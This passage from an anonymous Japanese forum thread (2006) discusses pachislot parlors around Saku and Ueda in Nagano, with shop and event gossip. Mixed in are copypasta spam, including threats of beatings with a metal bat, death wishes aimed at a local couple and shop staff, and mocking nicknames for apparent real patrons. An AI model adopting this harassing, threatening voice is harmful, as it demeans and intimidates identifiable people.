おいじゃねえんだよ(゜д゜)
たま潰すぞ

109 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 00:40:25 ID:T89FNR9l
針木の万枚ねーちゃん昔吉宗打ってた小さい人?
その人なら朝並んでたらおっさんにあんまり打つなとかお前のせいで常連こなくなったとかみんなに嫌われてるとか絡まれてたぞ。それからあまり針木でみなくなったような      バビデの本気出しでみた気もする

110 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 02:07:46 ID:RpOIxhZF
夢○って、何にも変わってなさそう。
駐車場に車が10台もないのを見たら、行く気が萎えるね。
ずっと前の何周年イベントは熱かったけどな。
女性はジャンケンして店員に勝てば、その場で設定6にしてくれてた。
俺もサイドラの6を短時間打てたので楽しかったよ。
もう、過去の思い出になっちまってるのかね。

111 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 02:10:56 ID:RpOIxhZF
針木のコンドルが美味いと思うのだがどうよ?
おお儲けを企んでいる人には向かないけど、10k〜20k儲けたいなら良いと思うよ。

112 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 02:22:47 ID:RpOIxhZF
今後の展開としては、店は5号機でも遊べる状態を提供し、客を5号機へ誘導していかなければならない。
現実は、店の売り上げを搾り出すのに精一杯だから5号機も低設定。客も飛ぶ状態。

規制緩和が無い限り、スロ業界が復活する事はないだろうね。

113 :チキン ◆1jM97Ys07g :2006/12/08(金) 06:21:31 ID:M8rgMz+N
スロ屋と言うかスロ業界、末期なんですかね〜
東信は勿論、北信もチョクチョク行ってますが酷いです(以前に比べて
現存してる4号機は、五号機購入の為の貯金箱・・・なんて妄想もしてしまいます。

あんまり好きじゃないんですが、ハイエナが多いこの頃です
出だま云々より、いかにハイエナが効くかで店選び・・・ほんと情けないです
東で目をつけてる店・・・針、目吐露、荒人(某系列ですが宣伝じゃない
ここ出玉は良くないですが(ごめんなさい)
ハイエナに適してます(クイブチでがぶっちゃけですもう

もう少し、色々見回ってみます・・・orz

114 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 09:08:40 ID:FHgt1iTa
夢〇って、ぱ〇塩の名変リニュだったの??
ぱ〇塩といえば、店員が濃かった。
用心棒風の男、キモデブキメ男、常に群れる女店員。善くも悪くも非常に珍しい店だった。
しかし、ぱ〇塩よ、素直にありがとうと言いたい。


イベント、新装はオイシカッタぞぉ。

115 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 15:26:41 ID:W2KqphY9
塩の店員なんて興味ねーよ!!


116 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 16:36:56 ID:rSln+VeR
もと塩も針木もまっ糞も三流以下のガセイベ、ボッタ沿革の店のスレなんていらね!
糞店なんて逝くな

117 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 19:22:29 ID:W2KqphY9
実は私‥元塩店員だがな。

118 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 20:13:51 ID:BcSya69d
↑だからなんだ?


119 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 20:28:18 ID:wrk//LuV
>>109
サンクス!


120 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 20:40:16 ID:W2KqphY9
自慢だよ自慢。
何釣られてるんだよ‥。

121 :ともや:2006/12/08(金) 23:01:31 ID:oND8IxUi
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 おらおらーくそどもー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1ともやさまのおでましだー俺は株で成功
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 した男俺はやくざだろうが、容赦しねー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 かっぱー酒かってこいや
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1金属ぼっこいっかんよ

122 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 23:13:11 ID:+0FdAn58
>>121
東信をウマく表現してるレスだなw

123 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 23:38:26 ID:T89FNR9l
今日の針木の押番はひどかったな
昨日は番長17台閉鎖してたしなにかあったのか?
ちなみに万枚ねーちゃんは友達の知り合いだよ


124 :「名無しわざとか?」とかイヤミを言われた:2006/12/08(金) 23:51:32 ID:rSln+VeR
121うぜ〜〜〜
めがねか?

125 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 00:35:10 ID:fL4SPcfT
sine

126 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 04:32:40 ID:pVdcsvel
ともやって誰?
詳細きぼんぬ

127 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 05:29:32 ID:LTnQB7oe
よくぞ来て下さいました。アウ板の伝説の男!

128 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 06:31:57 ID:WdCrh4Co
126
コピペだから相手にしない。
スゲー迷惑だけど

129 :まさとし:2006/12/09(土) 10:06:38 ID:ThK6r8Rh
雪降ってるねー。

130 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 12:19:34 ID:DNJFLyRr
佐久・上田も雪?

131 :ゴーレム土生田:2006/12/09(土) 15:08:47 ID:ThK6r8Rh
雨に変わってます。

132 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 16:13:02 ID:C8VQxoj4
叩かれてる店の定員が、スレを消そうとくだらねー事書いてる!師ね

133 :ひでろう:2006/12/09(土) 17:14:14 ID:ThK6r8Rh
↑同意。

134 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 17:52:05 ID:pVdcsvel
佐久小諸は雨

135 :佐藤:2006/12/09(土) 18:03:27 ID:ThK6r8Rh
俺の心は曇り空。

136 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 18:21:01 ID:fL4SPcfT
おまえはもう回収されている…

137 :ひさのり:2006/12/09(土) 19:28:35 ID:ThK6r8Rh
(*´д`*)↑意味不。

138 :「名無しわざとか?」とかイヤミを言われた:2006/12/09(土) 20:48:14 ID:WdCrh4Co
誰かマトモなカキコキボン!
みんな寒さのせいでやられてる。

139 :きむちちゃーはん:2006/12/10(日) 00:45:21 ID:B55NLG79
ヤバイ。宇宙ヤバイ。まじでヤバイよ、マジヤバイ。
宇宙ヤバイ。
まず広い。もう広いなんてもんじゃない。超広い。
広いとかっても「東京ドーム20個ぶんくらい?」
とか、もう、そういうレベルじゃない。
何しろ無限。スゲェ!なんか単位とか無いの。何坪とか何?fとかを超越してる。無限だし超広い。
しかも膨張してるらしい。ヤバイよ、膨張だよ。
だって普通は地球とか膨張しないじゃん。
だって自分の部屋の廊下がだんだん伸びてったら困るじゃん。
トイレとか超遠いとか困るっしょ。通学路が伸びて、一年のときは徒歩10分だったのに、
三年のときは自転車で二時間とか泣くっしょ。
だから地球とか膨張しない。話のわかるヤツだ。
けど宇宙はヤバイ。そんなの気にしない。膨張しまくり。
最も遠くから到達する光とか観測してもよくわかんないくらい遠い。ヤバすぎ。
無限っていたけど、もしかしたら有限かもしんない。でも有限って事にすると
「じゃあ、宇宙の端の外側ってナニよ?」
って事になるし、それは誰もわからない。ヤバイ。誰にも分からないなんて凄すぎる。
あと超寒い。約1ケルビン。摂氏で言うと−272℃。ヤバイ。寒すぎ。バナナで釘打つ暇もなく死ぬ。怖い。
それに超何も無い。超ガラガラ。それに超のんびり。億年とか平気で出てくる。億年て。小学生でも言わねぇよ、最近。
なんつっても宇宙は馬力が凄い。無限とか平気だし。
うちらなんて無限とかたかだか積分計算で出てきただけで上手く扱えないから有限にしたり、
fと置いてみたり、演算子使ったりするのに、宇宙は全然平気。無限を無限のまま扱ってる。凄い。ヤバイ。
たかが100年ちょいの人生‥今を大切に…。

140 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 06:31:44 ID:K5YIPEwd
↑と童貞くんが言ってますなぜ、ここまで訳わからんカキコするか、132も言ってるように叩かれた店の店員による梅工作だな。
はっきり言って超ウザイ。文面の内容も秋葉チックで肝杉。
どうせならもう少しまともな工作員使えよ!

141 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 06:57:26 ID:1SUPmL0b
傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘祇室佳佳佳佳佳佳佳
傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘蔀佳佳佳佳佳佳佳
傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘佳佳祇祇祇佳傘傘傘傘傘傘傘傘傘団祇佳佳佳佳佳佳
傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘祇蔀鏡蔀蔀蔀団団室蔀鏡鏡団傘傘傘傘傘傘傘蔀祇佳佳佳佳佳
傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘傘祇蔀鏡室団祇祇祇祇祇祇祇祇祇祇団蔀室佳傘傘傘傘傘輝団佳佳佳佳
傘傘傘傘傘傘傘傘傘傘傘傘傘傘祇鏡室祇祇祇祇祇祇祇祇祇祇祇祇祇祇祇祇団鏡団傘傘傘傘蔀祇佳佳佳佳
傘傘傘傘傘傘傘傘傘傘傘傘佳蔀蔀祇祇祇祇祇蔀鏡鏡蔀団祇祇祇祇祇祇祇祇祇祇蔀団傘傘佳室佳佳佳佳佳
傘傘傘傘傘傘傘傘傘傘傘祇鏡団祇祇祇祇祇蔀団祇祇祇蔀蔀祇祇祇祇祇祇祇祇祇祇団団傘祇室佳佳佳佳佳
傘傘傘傘傘傘傘傘傘傘室室祇祇祇祇祇祇室団祇祇祇祇祇団蔀祇祇祇祇祇祇祇祇祇祇室団祇蝶蔀団佳佳佳
傘傘傘傘傘傘傘傘傘蔀団祇祇祇祇祇祇祇鏡祇祇祇祇祇祇祇団室祇祇祇祇祇祇祇祇祇祇蔀蔀鏡鏡輝輝鏡鏡
傘傘傘傘傘傘傘傘蔀団祇蔀鏡蔀団祇祇団鏡祇祇祇団団祇祇祇蔀祇祇祇祇祇祇祇祇祇祇団蝶鏡鏡鏡鏡鏡鏡
傘傘傘傘傘傘傘団室祇鏡団祇団蔀室祇団鏡祇祇蔀臆桶団祇祇祇祇祇祇祇祇祇祇祇祇祇祇蔀鏡鏡鏡鏡鏡鏡
傘傘傘傘傘傘佳鏡祇蔀団祇祇祇祇室団祇団祇祇鏡橋橋輝祇祇祇蔀鏡団祇祇祇祇祇祇祇祇祇輝鏡鏡鏡鏡鏡
傘傘傘傘傘傘蔀団祇鏡祇祇祇祇祇祇祇祇祇祇祇団臆橋桶団団鏡蔀室室室団団祇祇祇祇祇祇蔀鏡鏡鏡鏡鏡
傘傘傘傘傘佳蔀祇団蔀祇祇祇団祇祇祇祇祇祇祇祇輝橋臆団鏡蔀室室室団室室団祇祇祇祇祇団輝鏡鏡鏡鏡
傘傘傘傘傘室団祇団室祇祇鏡桶団祇祇祇祇祇祇祇団輝蔀団鏡室室室佳傘団室室団祇祇祇祇祇鏡鏡鏡鏡鏡
傘傘傘傘傘鏡祇祇団室祇祇桶橋輝祇祇祇祇団蔀鏡鏡室祇蔀室室室室祇傘祇室室団祇祇祇祇祇鏡鏡鏡鏡鏡
傘傘傘傘佳蔀祇祇団室祇祇鏡臆臆団祇団鏡鏡蔀蔀蔀鏡鏡鏡室室室室団佳団室室室祇祇祇祇祇蔀鏡鏡鏡鏡
傘傘傘傘団団祇祇団蔀祇祇室臆臆団室鏡蔀蔀蔀蔀蔀蔀蔀蝶室室室室室室室室室室祇祇祇祇祇室鏡鏡鏡鏡
傘傘傘傘室祇祇祇祇団祇祇祇蔀鏡室鏡蔀団団室蔀蔀蔀蔀鏡鏡室室室室室室室室団祇祇祇祇祇室鏡鏡鏡鏡
傘傘傘傘蔀祇祇祇祇祇団室室団祇鏡蔀団傘傘団蔀蔀蔀蔀蔀鏡室室室室室室室室団祇祇祇祇祇室鏡鏡鏡鏡
傘傘傘傘室祇祇祇蔀鏡鏡蔀鏡鏡鏡鏡蔀団傘傘祇蔀蔀蔀蔀蔀鏡鏡室室室室室室団祇祇祇祇祇祇蔀鏡鏡鏡鏡
傘傘傘傘室団祇祇団室室室室室蔀鏡蔀蔀団団室蔀蔀蔀蔀鏡室団鏡鏡蔀蔀蔀鏡団祇祇祇祇祇祇鏡鏡鏡鏡鏡
傘傘傘傘団団祇祇団室室室室室室輝蔀蔀蔀蔀蔀蔀蔀蔀蔀鏡祇団鏡蝶蔀室団団祇祇祇祇祇祇祇鏡鏡鏡鏡鏡
傘傘傘傘祇蔀祇団団祇佳団室室室鏡鏡蔀蔀蔀蔀蔀蔀蔀鏡団蔀輝鏡鏡蔀祇祇祇祇祇祇祇祇祇団輝鏡鏡鏡鏡
傘傘傘傘傘鏡祇団団佳傘団室室室室輝蔀蔀蔀蔀蔀鏡鏡鏡輝鏡鏡鏡鏡鏡祇祇祇祇祇祇祇祇祇蔀鏡鏡鏡鏡桶
傘傘傘傘傘蔀祇団室団団団室室室室鏡鏡鏡鏡鏡鏡鏡輝鏡鏡鏡鏡鏡鏡鏡祇祇祇祇祇祇祇祇団輝鏡鏡鏡輝橋
傘傘傘傘傘団団祇室室室室室室室室鏡祇祇室鏡輝鏡鏡鏡鏡鏡鏡鏡鏡蔀祇祇祇祇祇祇祇祇蔀鏡鏡鏡鏡蝶臆
鏡祇傘傘傘傘蔀祇団室室室室室室鏡輝鏡輝輝鏡鏡鏡鏡鏡鏡鏡鏡鏡輝団祇祇祇祇祇祇祇団桶輝鏡鏡鏡臆臆
佳鏡傘傘傘傘蔀団祇団室室室室蔀蔀鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡輝祇祇祇祇祇祇祇祇輝蝶輝鏡鏡鏡臆臆
佳祇蔀佳傘傘佳鏡祇祇団団団鏡蔀祇団輝鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡蔀祇祇祇祇祇祇団輝蝶桶鏡鏡鏡蝶臆臆
佳佳室蔀鏡蔀蔀輝室祇祇祇祇団祇祇祇団輝鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡祇祇祇祇祇祇団輝輝桶蝶鏡鏡鏡鏡蝶桶
佳佳佳佳佳佳室鏡輝団祇祇祇祇祇祇祇祇団鏡輝鏡鏡鏡鏡鏡鏡輝団祇祇祇祇祇蔀輝輝輝臆鏡鏡鏡鏡鏡鏡鏡
佳佳佳佳佳佳佳鏡鏡輝団祇祇祇祇祇祇祇祇祇団鏡輝輝輝輝鏡団祇祇祇祇団鏡輝輝輝輝輝鏡鏡鏡鏡鏡鏡鏡
佳佳佳佳佳佳佳室鏡鏡輝蔀祇祇祇祇祇祇祇祇祇祇団団団祇祇祇祇祇団蔀臆蝶桶輝輝輝輝鏡鏡鏡鏡鏡鏡鏡
佳佳佳佳佳佳佳団鏡鏡鏡鏡輝蔀祇祇祇祇祇祇祇祇祇祇祇祇祇祇団鏡桶臆輝団鏡輝輝蝶鏡鏡鏡鏡鏡鏡鏡鏡
佳佳佳佳佳佳佳団鏡鏡鏡鏡鏡鏡輝鏡団団祇祇祇祇祇祇祇団蔀輝蝶蝶鏡室団鏡蝶桶蝶鏡鏡鏡鏡鏡鏡鏡鏡鏡
佳佳佳祇佳佳佳室鏡鏡鏡鏡鏡鏡鏡鏡鏡輝輝鏡鏡鏡鏡鏡桶桶臆輝輝輝蔀蝶蝶鏡輝鏡室蔀輝鏡鏡鏡鏡鏡鏡鏡
佳佳団団祇佳佳鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡輝蝶桶輝輝輝輝鏡鏡蔀祇蔀佳団輝鏡鏡鏡鏡輝輝
佳祇鏡団室室蔀輝輝輝輝輝鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡鏡蝶蝶輝蝶鏡鏡蔀団団団蔀輝鏡鏡鏡輝団佳

142 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 09:15:42 ID:s5RDmESK
141うぜ〜きちがいだな!
まっ糞ピエロ蟻針木アラジン並に頭わり〜

143 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 15:33:47 ID:or15YjCf
>>143
店の奴隷が何を言う

144 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 17:30:30 ID:sUQHE07P
場微の1台しかないのって
打つ気になれなくない?

145 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 17:35:33 ID:PDobz0uT
>>139はコピペ。
>>140はカコワルイ。

146 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 18:45:03 ID:B55NLG79
>>143 プギャーですな。

147 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 22:14:35 ID:CEb26fBT
も少しまともな板にしてくれ・・たのむわ。。。

148 :「名無しわざとか?」とかイヤミを言われた:2006/12/10(日) 23:10:38 ID:GAGv+Jxc
アクアビーナス意外にでるね

149 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 00:11:52 ID:ewnfQCBC
サンタさん愛車Dioのスタットレスをください☆彡

150 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 01:03:01 ID:svfgSfxn
$のCMハケーン
ttp://tube.hiroyuki.com/view_video.php?viewkey=c298ab50293adfecb7b1

151 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 08:25:27 ID:Yrom/fgX
| ∧         ∧
|/ ヽ        ./ .∧
|   `、     /   ∧
|      ̄ ̄ ̄    ヽ
| ̄   月曜日     ̄)
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄.\
|ヽ-=・=-′ ヽ-=・=-  /
|::    \___/    /     パチンコ店に行く準備できたか
|:::::::    \/     /

漏れは・・・○○○に逝くぜ!!

152 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 12:43:46 ID:SM44qpK6
Dioちゃんクリスマスに私が、新しい靴とズボンを買ってあげるわ(^ー^)
それと、スーパーカブも買ってあげるわ。

153 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 16:57:39 ID:XWjffqPJ
まっ糞って↑出ないし( ̄□ ̄;)!!定員のサービスも態度も悪いし↑( ̄□ ̄;)!!

154 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 19:45:09 ID:81wUx3Lp
他の店に行けばいいだけの話。

155 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 20:41:39 ID:f9j2je7I
地元のハローワクに行けばいいだけの話。あっ!働いて
いないから雇用保険が適用しないから無理か。残念!

156 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 20:56:28 ID:ExkCL40H
スロ依存だから病院に行けばいいだけの話
病気になっても国保を払ってないから行かれないか

157 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 21:44:51 ID:7CXQk8rU
番長打つならどの店かな?
個人的に野派、○、蟻が安定するかと思ってるけど。
スト消しヤホとか熱いのかな?

158 :ピン子:2006/12/11(月) 22:02:06 ID:zEPcRQzH
私は、編むによく行くんだけど、噂の浮浪者ニート君に恋したみたい。
凄くワイルドで素敵!本気で、仲良くなりたいです。
アドバイスお願いします。

159 :「名無しわざとか?」とかイヤミを言われた:2006/12/11(月) 23:10:08 ID:PtpgGa+k
>>158 海〇な、あいつは‥ゆ〇〇のぱしりだ。


160 :「名無しわざとか?」とかイヤミを言われた:2006/12/12(火) 00:42:20 ID:f3vTsPuG
私も小太りウエッティーさんに恋いをして松
クリスマスが近ずき心配事があります
ウエッティーさんのトレードマークの濡れ髪が凍ってしまわないか心配(T_T)
寒冷地仕様のポマードプレゼントしよっかなぁ♪

161 :「名無しわざとか?」とかイヤミを言われた:2006/12/12(火) 05:21:07 ID:H2ntyZss
上田バビ、客付きだけは相変わらずスゴイな
商売がうまいってこういう事なんだな。
しかし上田スロッターは思慮が浅いのが多い。

162 :「名無しわざとか?」とかイヤミを言われた:2006/12/12(火) 09:03:57 ID:YFYzRm3y
160
のカキコで小太りウエッティようやくわかりまちた。ただそれだけでつ。
あーいとぅいまてぇーん

163 :「名無しわざとか?」とかイヤミを言われた:2006/12/12(火) 10:39:28 ID:BOzM57pJ
柵蟻に行ったら今週土曜に激熱イベやるって言われたんだけど信じていいのかなぁ? トリプルって何の意味?知ってる人おしえて

164 :「名無しわざとか?」とかイヤミを言われた:2006/12/12(火) 12:18:08 ID:Jik3/Qfe
蟻は一周年祭りはしないNO?

165 :ともや:2006/12/12(火) 18:47:43 ID:Fwi48xlu
1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 なめくさったら最後n
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 やんよやんよ
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 おらおらくそどもー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 俺はやくざからも一目おかれている
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 俺はレディースをまもんよ
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 ともやさまの おでましだー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 きんぞくぼっこいっかんよ


166 :「名無しわざとか?」とかイヤミを言われた:2006/12/12(火) 22:38:30 ID:cSUwNtxw

激しくウザス
氏ね。なにがやくざだ。
低能クズが。

167 :「名無しわざとか?」とかイヤミを言われた:2006/12/12(火) 23:05:50 ID:YFYzRm3y
165はコピペのキチガイだから、ただただオツムがトロケテル真のウザと割り切りましょう。
誰にも相手にされず惨めな人生が確定なんでヤケおこしてるのでしょう。

168 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 00:01:29 ID:+xw6FwSa
アホ夫婦○○○○!
儲かってるンか?糞エ○クードから車かえやがった!
早く師ねSINE

169 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 00:12:22 ID:QP15M1Np
浮浪者ニートが白バイとパトカーに追い掛けられてたよ!もしかして1人暴走族?

170 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 04:13:35 ID:H6uaAzVD
そいつぁ滑稽だ。
ハハハ。

171 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 09:34:00 ID:YR/9npAh
さーて
どっちに行こうかな
それ

172 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 12:27:42 ID:aO4kSWAP


173 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 13:09:58 ID:G1anz386
まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞


174 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 14:11:59 ID:gHIToUPj
↑ウザ杉。
マニアな店に執着する変わり者だな。

175 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 18:43:14 ID:ihAF9lRe
ウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザ杉バカウザまっ糞と言ってみる!

176 :ピン子:2006/12/13(水) 19:22:30 ID:YYBMLx/i
浮浪者ニートさん元気ですか? 最近、編むのソファーで寝てるのをみかけるけど体の具合悪いのですか?昨日、目が合った時にドキっとしました。本気で恋いしたみたいなんです。彼女いるのかな?

177 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 19:59:24 ID:oEys/nCM
〇瀬有名だなあ〜

178 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 21:15:34 ID:+Rt/nHIp
モ〇コって、出ないね。
ガセ札、ガセイベ最近とくに酷い。

179 :「名無しわざとか?」とかイヤミを言われた:2006/12/13(水) 23:27:12 ID:UvauwshQ
モ○コグループのこと?

180 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 00:53:56 ID:UdMIqBgY ?2BP(0)
AM、悪、佐久蟻も土曜日がイベントですね。
佐久の蟻は、三つのイベントが一緒になったイベントみたいです。


181 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 12:40:32 ID:lPdPoIxk
編むの内○ふざけるな(−_−メ) フカシ野郎!!

182 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 13:51:59 ID:m918V263
編むのデブ軍団!キモイ(;-_-+

183 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 14:24:50 ID:ainFVJlr
>>182
オマイ、最優先!!

184 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 15:08:13 ID:IlP5z1r2
(・。・)

185 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 17:26:23 ID:IhkZZoxR
一般的に働いてる人は12月8日から12月15日がボーナス支給日がほとんどでした!
ぉマイら気をつけろ!すげー改修入るぞスロ屋!
パチ屋も社員バイトにボーナス支払うし。だいたい12月25日にパチ屋がボーナス
支給するから予算的な確保の為、煽りのメール多数!集客してボッタくるから!
騙されるな!

186 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 18:31:35 ID:RwMnbYyG
死んだじいちゃんが言った。
「1番は1番いいけど1番大変だよ。2番目くらいがいいんじゃないかねぇ。」
僕は聞いた 。
「でも2番は2番目に大変なんでしょ?」
じいちゃんは言った。
「そうだなあ。でもな、2番には1番になるって目標があるから、頑張れるよ。」

そんなじいちゃんが病気で倒れたとき僕はじいちゃんに言った。
「じいちゃん、僕、じいちゃんのことが世界で1番好きだよ。早く元気になって。
 僕をひとりにしないで」
じいちゃんは一生懸命笑って言った 。
「こればっかりはやっぱり1番が1番嬉しいねぇ」

じいちゃん、覚えてますか?
その1番はじいちゃんがずっと持っていてください。

僕は1番になる目標を持った2番でいいんだ。
じいちゃんが好きだった2番が大好きなんだ。

天国のじいちゃんに届け!186ゲット!


187 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 19:40:48 ID:+pK1BrgM
今度の土曜、何処で打つか悩んでるけどみんな何処行く?
〇犯のガセには何度も騙されてるし、やっぱ編かなぁ。
策蟻は今度の土曜こそ本気かな?

188 :「名無しわざとか?」とかイヤミを言われた:2006/12/14(木) 22:55:54 ID:XgPmiCRB
小太りウエッティーさんがデルNET1月号に写ってて素敵☆写真写りも最高に男前ね ハート

189 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 00:02:05 ID:TnY0OcgZ
土曜わ編むでいきます

190 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 00:41:44 ID:8Va48iAq
浮浪者ニートと呼ばないで!

191 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 02:04:48 ID:cQ9dtuOf
おい!バカ夫婦のお○○ら!師ね!
ブスアマの紙さん!ばばあのくせに、ローライズのジーンズから汚ねーケツ?背中?見せるな( ̄□ ̄;)!!


192 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 08:42:46 ID:T6KxhWJ7
バカ夫婦○○は○の仲間○○○○み、な○○○
だ○○○○、○○きも○半にいるのか

193 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 09:04:33 ID:b0O3nYNq
なんだこの怨念めいたスレこわっ!
お前ら暗いにもほどがあるぞ

194 :ともや:2006/12/15(金) 11:01:53 ID:H+p2mHLA
おらおら〜ともやさまのおでましだー景気ずけに、金属ボッコいっかんよー受けてーやつは、らいずの向かいのハナマルに並んどけやー

195 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 13:14:50 ID:ie6nTeV7
>>188
おでも写っとる

196 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 14:12:09 ID:oFNGOpUs
土曜は悪で決まりですね!

197 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 14:43:07 ID:uK4ocXaT
↑冗談ですよね!?
とマジレス。

198 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 16:42:18 ID:m+yteaLj
冗談じゃないでしょ。
週末は悪が本命って思ってる人多いんじゃないかな?


199 :007:2006/12/15(金) 16:44:36 ID:NvKtAYNg
>>188

200 :ともや:2006/12/15(金) 17:11:01 ID:bUmje83C
1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 なめくさったら最後n
